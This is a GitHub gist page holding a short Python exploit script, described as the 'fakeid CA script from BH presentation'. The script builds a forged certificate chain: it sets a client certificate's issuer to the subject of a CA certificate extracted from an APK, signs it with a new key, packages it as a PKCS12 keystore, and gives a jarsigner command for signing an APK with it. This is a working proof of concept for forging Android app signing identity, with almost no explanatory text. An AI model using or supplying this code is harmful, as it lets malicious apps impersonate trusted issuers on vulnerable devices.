Skip to content

Instantly share code, notes, and snippets.

@flankerhqd

flankerhqd/Python

Created August 18, 2014 02:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save flankerhqd/72675b73900d0a782a91 to your computer and use it in GitHub Desktop.
Save flankerhqd/72675b73900d0a782a91 to your computer and use it in GitHub Desktop.
Download ZIP
fakeid CA script from BH presentation
Raw
Python
import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer
#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA
cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)
#client.cer
oricert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('client.cer','r').read())
oricert.set_issuer(cacert.get_subject())
oricert.set_pubkey(pk)
oricert.sign(pk, "sha1")
pkcs12 = OpenSSL.crypto.PKCS12()
pkcs12.set_privatekey(pk)
pkcs12.set_certificate(oricert)
pkcs12.set_ca_certificates([cacert])
finalPkcs12Data = pkcs12.export(passphrase='1234')
pp = load_pkcs12(finalPkcs12Data, '1234')#verify keystore
#store keystore
print >> open('out.p12','wb'), finalPkcs12Data
#jarsigner -keystore out.p12 -storetype pkcs12 -sigalg SHA1withRSA -digestalg SHA1 app-debug.apk 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment